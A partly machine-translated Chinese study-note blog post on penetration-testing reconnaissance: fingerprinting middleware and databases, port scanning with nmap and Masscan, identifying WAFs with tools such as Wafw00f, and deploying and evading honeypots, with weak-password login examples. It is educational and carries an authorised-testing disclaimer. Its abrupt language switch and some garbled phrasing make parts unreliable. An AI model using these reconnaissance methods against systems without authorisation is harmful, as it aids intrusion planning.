1.认识中间件(Web服务，应用服务器)，数据库类型

前言

自己本身是一个学习两年网络安全的小白师傅，想想两年来都没有系统的学习过，所以就想着看看小迪的课程，顺便将自己的理解与小迪的课程做一个结合，以文字+图片的形式呈现给大家。看了小迪的课程，真觉得小迪的课程是yyds！-- 我看的是2024年的视频

学习内容

本次学习内容：

1.认识中间件(Web服务，应用服务器)，数据库类型

2.认识WAF

3.端口扫描是什么？为什么要进行端口扫描？

4.蜜罐是什么？如何搭建蜜罐？如何不踩到蜜罐？

第15天：主机架构&蜜罐识别&WAF识别&端口扫描&协议识别&服务安全

学习地址：【小迪安全】全栈网络安全 | 渗透测试 | 高级红蓝对抗 V2024最新版 (完)_哔哩哔哩_bilibili

正式开始

知识点一：认识中间件与数据库

当我们要对一个网站进行渗透测试的时候，我们可以通过去认识网站的中间件以及数据库信息，来决定我们的攻击路径以及攻击思路：当网站使用的是Mysql的数据库的时候，我们构造SQL语句的时候是不是要采用Mysql的语法？当网站使用java语言的时候，我们上传的木马是不是就不能上传PHP木马？当网站用到一个若依系统的时候，我们是不是可以去通过搜索，了解到这个系统的Nday漏洞？

以上的答案是：当然！！！

可能有的师傅不明白什么是中间件：

其实很简单，举个例子：小皮面板，就是Web服务器，若依OA、博客系统这种就是应用服务器。这两者都是中间件。什么是数据库，存放数据的地方就是数据库，例如mysql数据库。（什么你说不用数据库也可能存放数据，当然有办法~但是不会这么做~别问，问就是”约定俗成“）

那么我们如何去识别出网站的框架，收集这些信息，从而去规划我们的攻击思路呢？？？

这样的方法复杂吗？？？

主播主播有没有好用又不复杂的方法？？？

有的有的！！！

首先是通过数据包观察

通过BP抓包，或者其他的抓包软件，看数据包信息Server字段来判断：

这是什么我不认识，怎么办？？？我直接就是一个百度，手把手教你认识~

OK了吧

Method two, through the built-in plug-in of the browser

Method three, through the space engine,For example, Yingtutu,360,fofa

总结：

Anchor, what should I do if I collect this information and it is not useful? It's easy to not use it, ask AI, deepseek the Chinese national glory~

These basic concepts are actually very simple, if you don't understand, just put them inAIAsk it, what is this thing!!!! What kind of vulnerabilities!!!! If you don't say it, I'll break your leg!!!! It is veryOK~

Knowledge point two: port scanning

What is port scanning really, why are the explanations on the Internet so complicated?

This is simple,ipKnow it, port know it, how many ports do you know,This way you will know how to do port scanning~

For exampleipfor192.168.121.14, so port scanning is192.168.121.14:1-66535 scan all, this is port scanning

Why do port scanning? What is the underlying logic of port scanning that can scan out vulnerabilities?

It's very simple, understand it as: the default opening logic,BPHave you used packet capture software?BPIs it automatically captured8080content in the port, this is the default port service. So some services, some websites, some configurations, they have their corresponding default ports. And these things have Nday vulnerabilities, so they have created port scanning --> vulnerability scanning.

These service opening ports can be modified? Of course!!! But will someone modify them?

most will not, so we can pass through these so-called"Conventional wisdom"port, theserules have created this vulnerability in port scanning.

(It is worth noting that,80port443ports, these ports are definitelyhttp/httpsports? Not necessarily!!! These can be changed!!!)

The logic of port scanning is just because of the industry"Conventional wisdom"rules, and quickly identify them. If you want to accurately judge the service of the port, you need to collect information from multiple aspects.

(But to be honest, most people in the industry will not change the default ports, so you can test according to the experience of predecessors)~)

These are some common port vulnerabilities~

Anchor, manually identifying the service of the port is still too difficult, is there an easier way?

There are three ways like this

Enter through the space engine,ip,Observe the portAs soon as~

Method two: actively scan all ports through the tool

To be honest, this tool is actually not very easy to use, there are quite a few bugs, but it is convenient for demonstration~

StatusOPENIt represents that the port is open,ClosedIt represents that the port is closed

Why can closed ports also be scanned?

Case one:

This is because, when the tool scans, the service detected that it is enabled. However, the server can refuse this visit through the firewall configuration.

这就导致了，能知道其存在，但无法进入。做个比喻：你知道门在你眼前，但你没有钥匙，无法进门。

情况二：

还有可能是内网环境，通过反向代理的方式，让我们能访问到服务，但却找不到端口的入口。做个比喻：

火影忍者，鸣人进行了分身，你能找到他的分身，你能攻击他的分身，但这不会对他本体造成伤害~

选择你要扫描的配置，但其实这些都是nmap的命令，可以自己去进行一个查询。然后开始扫描即可~

如果你觉得这个工具太慢，可以使用用这个工具：Masscan

总结：

端口扫描，就是去探测每个端口的服务，查看每个端口的服务中是否有漏洞。而最经常用的方式，是打Nday漏洞，而不是去挖掘。（你问原因，问就是菜，如果你强一样能找到每个端口中服务中的0day漏洞，但前期还是建议试试nday的漏洞即可~）端口扫描的难点并不是在如何识别端口服务，而是如何找到一个真实IP~假如别人使用了CDN，你应该如何绕过？下篇文章讲，嘿嘿~

知识点三：认识waf防火墙

WAF解释：

Web应用防护系统（也称为：网站应用级入侵防御系统。英文：WebApplicationFirewall，简称：WAF）。利用国际上公认的一种说法：Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。

WAF分类：

云WAF：百度安全宝、阿里云盾、长亭雷池，华为云，亚马逊云等

硬件WAF：绿盟、安恒、深信服、知道创宇等公司商业产品

软件WAF：宝塔，安全狗、D盾等代码级WAF

自己写的waf规则，防止出现注入等，一般是在代码里面写死的

只有认识waf，才能根据不同的waf制定绕过策略。哈哈，但绕过waf是一条很长的路，所以先弄明白什么是waf吧。认识waf。

这样至少在提问的时候，知道具体的waf是哪个~

防御的强度为云WAF>硬件WAF>软件WAF=自己写的waf规则(这个不好说，看写waf规则的人代码能力~)

那么如何知道网站用什么waf呢？？？

有的有的，有三种方式能让你快速知道一个网站的Waf

空间引擎识别waf，哈哈空间引擎的作用是不是很大，什么都能识别？以360为例

输入你要测试网站的域名，那么空间引擎就会显现出你想要的结果

还有一些工具，例如identYwaf

这个软件是将waf的警告图片进行了收集，通过这些图片的特征去识别Waf产品

It's also very simple to use, it requires a Python environment, and you can input the domain name

Tool two: Wafw00f

This is also very simple. The difference is that it will give you an accurate WAF name, not just various probabilities

Method three, image recognition

Save the image to Google

Image recognition

But I want to remind everyone (haha, I am too),With thiseduFor example: the website

On the same website, we use tools andAIPerform feature recognition

The possibility of the tool showing 360Waf is the highest, and there is no possibility of Alibaba Cloud Waf

AI shows Alibaba Cloud Waf

What does this mean? It means that anything, any tool, is made by people. As long as it is made by people, the accuracy of identification and the functionality depend only on the knowledge limit of the person who opens the tool. Let's have another thought, truly useful tools, truly powerful tools, can only be written by yourself, because such tools are most suitable for yourself~

Knowledge point 4: Understand honey pots, set up honey pots

-Honey pot explanation: A honey pot is a security threat detection technology, its essence lies in luring and deceiving attackers, and through recording attackers' attack logs to generate value. Security researchers can infer the attackers' intentions and methods by analyzing the attack records of honey pots. Attackers can use honey pot identification technology to discover and circumvent honey pots. Therefore, it is necessary for us to study the methods of honey pot identification from the perspective of red team attackers.

-Honey pot classification: Honey pots can be divided into three categories based on the degree of interaction between the honey pot and the attacker: low-interaction honey pots, medium-interaction honey pots, and high-interaction honey pots. Of course, they can also be classified according to the target simulated by the honey pot, such as: database honey pots, industrial control honey pots, Internet of Things honey pots, Web honey pots, etc.

What low-interaction honey pots, medium-interaction honey pots, and high-interaction honey pots are, simply put, it is the level of refinement of honey pots. A low-interaction honey pot may just have a login box, and there's nothing else after you log in. A high-interaction honey pot is no different from a normal website, having a database,WEBpages, middleware,wafManagement page, allowing you to keep渗透testing on this website. Collecting yourIPThe address, phone number, and the temptation to download the trojan files in the honey pot are mainly used to waste your time.

In fact, you don't need to know so many strange and odd concepts. You can understand that it is just a phishing website set up by hackers, but the targets are the red team, hackers, and penetration testers, not ordinary users~The most annoying place can waste a lot of your time, because, after all, it's a honey pot, and there's not much use in taking it down. But is it really useless? This is actually not absolute~Haha. There is no need to go into detail here, just understand the basics and be able to identify honey pots.

Firstly, let's enter the perspective of the blue team:Deploy honey potsArticle address

It will be set up quickly~

This will automatically deploy the honey pot to some ports for you, and you can try to access it.

Let's simulate the attack method of weak passwords~

admin root

admin 123456

... ...

Then through our honey pot management panel

You can see the visiting IP, I am using my own IP to attack myself~ hehe

You can see the specific input of the attacker

So how can we avoid stepping into honey pots in our daily testing?

A more correct way is toJSreverse engineering, because the honey pot needs to collect your information, which requires traffic forwarding. The statements for forwarding traffic are often written inJSin, you can check throughJSto view, but this takes too much time

Is there a simple and quick way?

There are some methods like this3Hahaha

Space engine, hahaha, it's me again, the space engine can also identify honey pots, for example:

Browser plugin

If the website is a honey pot, it will automatically trigger an alarm.

GitHub tool recommendation:https://github.com/360quake/quake_rs

But you need the 360 key, simply put, you need to become a member~

The principle of honey pot identification will not be elaborated further; those who are interested can go and see for themselves.

Principle of honey pot identification:Who is the fish and who is the bait? Summary of honey pot identification methods from the perspective of the red team

Summary

This article mainly guides you through a specific information collection process for a website. What is mentioned above is the most common collection content. Once we clarify the above, we can be more skillful in penetrating the website. Lastly, I wish everyone a happy and joyful day!

Disclaimer

• The content contained in this article is for educational and research purposes only, aiming to raise awareness of information security and help users understand the importance of network security protection.

• Any penetration testing techniques, tools, or methods mentioned in the article are for legitimate authorized security research and testing purposes only. Ensure that you have obtained explicit authorization from the owner of the relevant system or network before conducting any penetration testing or security testing.

• The author of this article assumes no responsibility for any illegal activities, damages, or other adverse consequences arising from the use of the content of this article. Readers should ensure compliance with all applicable laws and regulations before implementing any technology.

• The content of this article does not support or encourage any form of malicious attack, unauthorized intrusion, or cybercrime.

• The content of this article is limited to educational purposes and may not be used in any way for unauthorized network security attacks or disruptive behavior.